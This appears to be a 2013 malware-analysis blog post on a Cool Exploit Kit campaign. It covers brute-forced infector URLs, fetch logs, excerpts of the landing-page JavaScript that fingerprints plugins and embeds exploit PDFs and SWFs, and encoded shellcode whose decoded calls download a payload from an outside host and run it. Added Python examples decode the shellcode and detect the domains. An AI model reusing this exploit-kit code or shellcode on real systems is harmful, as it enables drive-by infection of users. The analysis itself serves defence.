I was hinted at the URL with the hostname hypnotherapyaz.com (thanks to a crusader whom I can't mention here), which matched the IP in another researcher's (@kafeine) tweet, and which accidentally has a correlation to a hacked domain owner, Bob Faith, whom the MalwareMustDie Tango Team is currently processing. The investigation text part can be found here -->>[PASTEBIN].
I also sought the possible domain names used by the suspected server, as below:
50f2c40a75730.buyliftem.org        A 64.120.190.183
50f3308d0dc4d.mentalfocus.org      A 64.120.190.183
50f2d9ddf1471.azhypnotistbob.com   A 64.120.190.183
50f2afa39be68.azreptheatre.com     A 64.120.190.183
50f28a4b9a4fe.tempeazhomeloans.com A 64.120.190.183
50f30534b0cb0.hypnoaz.com          A 64.120.190.183
50f34659158a0.mentalfocusaz.com    A 64.120.190.183
50f31ac55ce66.hypnotherapyaz.com   A 64.120.190.183
Knowing what the domains' landing pages might look like from reading references, I made a personal brute-force shell script for the possible landing page URLs, using the last strings of the suspected domains, starting from the directory after news/ (and some other dirs too), to landing pages like Sale.Dilute.jsp, ray.dhtml, OPERATION.PHP5, etc. (the script was made for FreeBSD only; after it is stable and supports Linux too we will upload it to our Google Project site).
All I did was use the 200 OK response for each call while bruting the URLs, and the matches came up as per the infector URLs below:
h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm
h00p://50f2d9ddf1471.azhypnotistbob.com/news/Bible.phps
h00p://50f2d9ddf1471.azhypnotistbob.com/news/Guilt.phtm

From the domain names burped up by the brute-force I saw a certain pattern, so I expanded the search with the same method to a wider network and found the URLs below, coming from IP 72.46.132.214:
h00p://50f2e82b777c7.bobfaith.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2e0e1f35ef.azhypnotistbob.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2cb535212f.azhypno.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2e82b777c7.bobfaith.com/news/Sun_Relinquish.aspx
h00p://50f2e0e1f35ef.azhypnotistbob.com/news/Bible.phps

FYI, historically 72.46.132.214 also had pointers from the domains below, following the same pseudo-random domain/DGA pattern used by Cool Exploit Kit.
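A defender-side check built on the hostname pattern above, as an added example (not the post's or MalwareMustDie's code): the leftmost label of each infector hostname is 13 lowercase hex characters, which is the shape of PHP uniqid() output, whose first eight hex digits are the Unix time in seconds (my reading; the post only calls it a pseudo-random/DGA pattern). The code walks constructed DNS log lines, decodes that timestamp, and flags only labels minted shortly before they were queried, which for the post's hostnames decodes to dates matching its mid-January 2013 analysis.

```python
import re
from datetime import datetime, timezone

# Assumption (not stated in the post): the 13-hex-char label is PHP uniqid()
# output, i.e. 8 hex digits of Unix seconds followed by 5 hex digits of
# microseconds, so the label records when it was minted.
LABEL_RE = re.compile(r"^([0-9a-f]{8})([0-9a-f]{5})\.([a-z0-9.-]+)$")

# Constructed sample log lines (hostnames taken from the post, clients invented).
LOG_LINES = [
    "2013-01-14T10:28:08Z client=10.0.0.7 query=50f31ac55ce66.hypnotherapyaz.com",
    "2013-01-14T10:29:01Z client=10.0.0.7 query=www.hypnotherapyaz.com",
    "2013-01-14T10:47:25Z client=10.0.0.9 query=50f39fe3d7007.socialmediahypnotist.com",
    "2013-01-14T11:02:13Z client=10.0.0.4 query=0123456789abc.example.com",
    "2013-01-14T11:05:40Z client=10.0.0.4 query=cdn.example.net",
]


def label_timestamp(hostname):
    """Return (minted_at, parent_domain) if the first label has uniqid() shape, else None."""
    m = LABEL_RE.match(hostname.lower())
    if not m:
        return None
    secs = int(m.group(1), 16)
    return datetime.fromtimestamp(secs, tz=timezone.utc), m.group(3)


def flag_suspicious(lines, max_age_days=14):
    """Flag queries whose hex label decodes to a time shortly before the query itself."""
    hits = []
    for line in lines:
        seen = datetime.strptime(line[:20], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        host = line.rsplit("query=", 1)[1]
        decoded = label_timestamp(host)
        if decoded is None:
            continue
        minted, parent = decoded
        age = (seen - minted).total_seconds()
        # A freshly minted uniqid() label is used soon after creation; a hex-looking
        # label that decodes to 1970 or to the future is just a hex-looking name.
        if 0 <= age <= max_age_days * 86400:
            hits.append((host, parent, minted.isoformat()))
    return hits


if __name__ == "__main__":
    for host, parent, minted in flag_suspicious(LOG_LINES):
        print(f"{host}  parent={parent}  label minted {minted}")
```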
The landing page looks like below (screenshot); as you can see, it is the typical landing page of Cool Exploit Kit.
I fetched the landing page:

#MalwareMustDie!--19:28:07-- h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm
 => `Guilt.phtm'
Resolving 50f31ac55ce66.hypnotherapyaz.com... seconds 0.00, 64.120.190.183
Caching 50f31ac55ce66.hypnotherapyaz.com => 64.120.190.183
Connecting to 50f31ac55ce66.hypnotherapyaz.com|64.120.190.183|:80... seconds 0.00, connected.
: GET /news/Guilt.phtm HTTP/1.0
Referer: http://www.google.com/search?q=youtube
User-Agent: MalwareMustDie Draining Your Cool EK
Host: 50f31ac55ce66.hypnotherapyaz.com
: HTTP request sent, awaiting response...
: HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 14 Jan 2013 10:28:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.16
: 200 OK
Length: unspecified [text/html]
19:28:09 (41.02 KB/s) - `Guilt.phtm' saved [16046]

I neutralized it with jinxed code here -->>[PASTEBIN]. Without reading the code you can grep the plain possible URLs in it, to find the links below:

h00p://50f31ac55ce66.hypnotherapyaz.com/news/tentative.jar
h00p://50f31ac55ce66.hypnotherapyaz.com/news/Shore_Rightly2.pdf
h00p://50f31ac55ce66.hypnotherapyaz.com/news/live1.pdf
h00p://50f31ac55ce66.hypnotherapyaz.com/news/INDUSTRIAL1.SWF

Oh yes, I drained it up. PoC: here are all of the download logs as evidence :-) -->>[PASTEBIN]
PS: the last attempt showed that the bad actors removed the jars:

$ cat tentative.jar
<b>ERROR 404 CONTENT</b>

Decoding & understanding how it infects us!
So let's peel the landing page code; this is a more structured version -->>[PASTEBIN]. For obfuscation, there was none. You'll see the condensed script and that's it. The trick of using variables as wordings is used but wasn't difficult to figure out. I wonder why morons must pay a high price for junk code like this. Honestly, I cannot say this is much smarter stuff than BHEK. Well, I will try to explain the infection part based on this structure.

In the first script it gets the Adobe version (self explanatory):

try {
    control = new ActiveXObject('PDF.PdfCtrl');
} catch (e) {}
if (control) {
    isInstalled = true;
    version = control.GetVersions().split(',');
    version = version[0].split('=');
    version = parseFloat(version[1]);
    Roar = version;
    pull = true;
}

In the 2nd script it gets the Java version for IE or Netscape (Mozilla):

if (br == 'MSIE') {
    if (this.ax('1.7.0')) { immense[0] = '1.7.0' }
    else if (this.ax('1.6.0')) { immense[0] = '1.6.0' }
    else if (this.ax('1.5.0')) { immense[0] = '1.5.0' }
    else if (this.ax('1.4.2')) { immense[0] = '1.4.2' }
    else if (this.tm()) { immense[0] = '1.1' }
} else if (br == 'Netscape Family') {
    this.gj();
    if (this.Heredity != null) { immense[0] = this.Heredity }
    else if (this.tt('1.7')) { immense[0] = '1.7.0' }
    else if (this.tt('1.6')) { immense[0] = '1.6.0' }
    else if (this.tt('1.5')) { immense[0] = '1.5.0' }
    else if (this.tt('1.4.2')) { immense[0] = '1.4.2' }
}

This is how it checks browsers (see the version as well):

g6: function() {
    if (this.Century == null) {
        var br = navigator.userAgent.toLowerCase();
        if ((br.indexOf('msie') != -1) && (br.indexOf('opera') == -1)) { this.Century = 'MSIE'; this.Sand = 'MSIE' }
        else if (br.indexOf('iphone') != -1) { this.Century = 'Netscape Family'; this.Sand = 'iPhone' }
        else if ((br.indexOf('firefox') != -1) && (br.indexOf('opera') == -1)) { this.Century = 'Netscape Family'; this.Sand = 'Firefox' }
        else if (br.indexOf('chrome') != -1) { this.Century = 'Netscape Family'; this.Sand = 'Chrome' }
        else if (br.indexOf('safari') != -1) { this.Century = 'Netscape Family'; this.Sand = 'Safari' }
        else if ((br.indexOf('mozilla') != -1) && (br.indexOf('opera') == -1)) { this.Century = 'Netscape Family'; this.Sand = 'Other' }
        else if (br.indexOf('opera') != -1) { this.Century = 'Netscape Family'; this.Sand = 'Opera' }
        else { this.Century = '?'; this.Sand = 'unknown' }
    }
    return this.Century
}

How it exploits PDF (a function to be called by the exploiter):

function ATTENTIONAMATEUR(tactic, diameter, warrant) {
    var hey = '7221';
    document.body.appendChild(document.createElement("p", "8241"));
    document.body.appendChild(document.createElement("p", "Microphone Acceptable Exaggerate Fond Tide"));
}
DETAIL.innerHTML = '<object data="/' + (((Roar > 0) && (Roar < 8)) ? ('news/Shore_Rightly2.pdf') : ('news/live1.pdf')) + '" type="application/pdf" width="200" height="100"><embed src="/' + (((Roar > 0) && (Roar < 8)) ? ('news/Shore_Rightly2.pdf') : ('news/live1.pdf')) + '" type="application/pdf" width="100" height="200" /></object>';

How it exploits Flash via getCN (a function to be called by the exploiter):

function getCN() { return "/news/INDUSTRIAL1.SWF" }

Other parts of the script are a shellcode (explained later); the rest is not significant to discuss, except some straight PDF infectors in object tags in the HTML:

<noscript>
<object data="/news/live1.pdf" type="application/pdf" width="100" height="300">
<embed src="/news/live1.pdf" type="application/pdf" width="300" height="100" /></object>
<object data="/news/Shore_Rightly2.pdf" type="application/pdf" width="300" height="300">
<embed src="/news/Shore_Rightly2.pdf" type="application/pdf" width="200" height="200" /></object>
</noscript>

The Shellcode & Payload
It has the shellcode function vfsq, snipped below (it can be called openly too):

function vfsq() {
    xz = "%u";
    var a = "8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4.. !e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59.. !a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8e.. !a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b5.. !7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7d.. !24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17.. !52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80.. !d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a.. !4ecf!6638!1414!1414!".split("").reverse().join("");
    return a["replace"](/!/g, xz)
}

We can use the Blackhole decode method (please see the previous blog posts about manually decoding shellcode) to get the shellcode, snipped below:

41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 3c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff  .<..0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
: : :
4c 1f 18 18 1f 06 5b 47 4b 41 49 44 45 4d 4c 41  L.....[GKAIDEMLA
49 40 51 58 46 47 5c 41 5b 5c 06 4b 47 45 07 46  I@QXFG\A[\.KGE.F
4d 5f 5b 07 5c 4d 46 5c 49 5c 41 5e 4d 11 06 4d  M_[.\MF\I\A^M..M
50 4d 28 28                                      PM((

The last part is the encoded URL.
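The two decode steps described above, written out in Python as an added example (not the post's own tooling): replaying the vfsq() string trick (reverse, `!` to `%u`, unescape to little-endian bytes) and recovering the single-byte XOR key of the trailing URL by scoring how URL-like each candidate plaintext is. Only the fragments visible on the page are used; on the dump rows shown, the key that yields the URL tail is 0x28, which is also the immediate in the decoder stub's `80 30 28` (xor byte ptr [eax], 28h), so the stub check and the brute force corroborate each other.

```python
import re

# Constructed from the page: the tail of the vfsq() string (its middle is snipped
# there), the first 25 bytes of the decoded dump (the decoder stub), and the last
# four dump rows (the encoded URL tail; the "http://50f39fe3" part lies in the
# snipped ': : :' region, so only the tail can be recovered here).
VFSQ_TAIL = "!4ecf!6638!1414!1414!"
STUB = bytes.fromhex("414141416683e4fcfceb105831c96681e93cfe80302840e2fa")
URL_TAIL = bytes.fromhex(
    "4c1f18181f065b474b414944454d4c41"
    "4940515846475c415b5c064b47450746"
    "4d5f5b075c4d465c495c415e4d11064d"
    "504d2828"
)
URL_CHARS = set("abcdefghijklmnopqrstuvwxyz0123456789./-:")


def decode_vfsq(encoded):
    """Replay vfsq(): reverse the string, turn '!' into '%u', then emit each
    %uXXXX unit as the two little-endian bytes a JS string holds in memory."""
    s = encoded[::-1].replace("!", "%u")
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", s):
        v = int(unit, 16)
        out += bytes((v & 0xFF, v >> 8))
    return bytes(out)


def key_from_stub(code):
    """Read the XOR key straight out of a 'xor byte ptr [eax], imm8' (80 30 ib)."""
    i = code.find(b"\x80\x30")
    return code[i + 2] if i != -1 else None


def recover_xor_key(data):
    """Try all 256 single-byte keys; keep the one whose output, up to the first
    NUL, contains the most URL characters (lowercase host/path alphabet)."""
    best = (-1, None, "")
    for key in range(256):
        plain = bytes(b ^ key for b in data).split(b"\x00", 1)[0]
        text = plain.decode("latin-1")
        score = sum(c in URL_CHARS for c in text)
        if score > best[0]:
            best = (score, key, text)
    return best[1], best[2]


if __name__ == "__main__":
    print("vfsq tail decodes to:", decode_vfsq(VFSQ_TAIL).hex())
    print("key from decoder stub: 0x%02x" % key_from_stub(STUB))
    key, url = recover_xor_key(URL_TAIL)
    print("brute-forced key: 0x%02x -> %s" % (key, url))
```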
You can XOR it with the FF key, or translate the shellcode API calls into:

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exe, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

to get the payload URL below:

h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exe

Oh, of course I fetched the payload:

HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Mon, 14 Jan 2013 10:47:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.16
Pragma: public
Expires: Mon, 14 Jan 2013 10:47:26 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 171008
200 OK
Registered socket 1896 for persistent reuse.
Length: 171,008 (167K) [application/x-msdownload]
19:47:29 (49.03 KB/s) - `tentative9.exe' saved [171008/171008]

Here it is. The binary's details look like below (you'll see Microsoft's nslookup.exe in a Russian compilation version.. a stupid LOL :-)

ExifTool:
SubsystemVersion.........: 5.0
LinkerVersion............: 9.0
ImageVersion.............: 0.0
FileSubtype..............: 0
FileVersionNumber........: 5.1.2600.5512
UninitializedDataSize....: 0
LanguageCode.............: Russian
FileFlagsMask............: 0x003f
CharacterSet.............: Unicode
InitializedDataSize......: 167424
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
LegalCopyright...........: . .
FileVersion..............: 5.1.2600.5512 (xpsp.080413-2113)
TimeStamp................: 2013:01:14 05:53:59+00:00
FileType.................: Win32 DLL
PEType...................: PE32
InternalName.............: nslookup.exe
ProductVersion...........: 5.1.2600.5512
FileDescription..........: nslookup APP
OSVersion................: 5.0
OriginalFilename.........: nslookup.exe
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............:
CodeSize.................: 2560
ProductName..............: Microsoft Windows
ProductVersionNumber.....: 5.1.2600.5512
EntryPoint...............: 0x1330
ObjectFileType...........: Executable application
Compilation timedatestamp: 2013-01-14 05:53:59
Target machine...........: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address......: 0x00001330

VirusTotal report of the payload:

SHA256: 212eae2b7cc22585dfdfdb3e1046b4dc56c31561a2b20f7f093bc8d9a5d78534
SHA1: 0ba1ab63f821d0e52d4b03780c13e24da9233c98
MD5: d3aa34ec10b0fe1efa2e1e17058c7697
File size: 167.0 KB ( 171008 bytes )
File name: d3aa34ec10b0fe1efa2e1e17058c7697
File type: Win32 DLL
Tags: pedll
Detection ratio: 2 / 35
Analysis date: 2013-01-14 08:41:03 UTC ( 4 hours, 47 minutes ago )
URL --->>[VirusTotal]
Names:
Malwarebytes : Trojan.FakeMS
Norman : W32/Kryptik.GBT

I bet the payload is Reveton. I don't have enough time left in this crusade to start analyzing all samples yet, but I made a detection ratio table for the positive samples based on the VT reports, as below (click the numbers in the left column for the link to VT):

No.  Date        Time   Size     FileName            VT    MD5
---------------------------------------------------------------------------------------
[1]  2013/01/14  19:28  16,046   Guilt.phtm          0/46  36c48f20a9badcffc4164558953eda42
[2]  2013/01/14  19:59  7,245    INDUSTRIAL1.SWF     2/46  49b376cc6f7d6e229b7ab1a2daa21e17
[3]  2013/01/14  19:57  9,660    live1.pdf           1/46  863d68bacfbddb042bdb1640cee68185
[4]  2013/01/14  19:55  20,190   Shore_Rightly2.pdf  7/29  10ad085df6e92258727695e186d22ce0
[5]  2013/01/14  19:47  171,008  tentative9.exe      9/46  d3aa34ec10b0fe1efa2e1e17058c7697

Samples
Samples are shared to increase the AV detection ratio and for research purposes -->>[HERE]

Source of infection
These are the IPs of the active Cool Exploit Kit malware infectors (monitored so far); blocking access to these IPs is very recommendable advice. If you think I am paranoid, see this list -->>[PASTEBIN]
Some more IPs are still shifting; I will update regularly.

*) The post will be updated regularly (after work); please bear with me if corrections occur.
*) For Cool EK references, a Google search gave good ones -->>[GOOGLE]
*) Latest current infections of Cool EK in URLQuery -->>[HERE]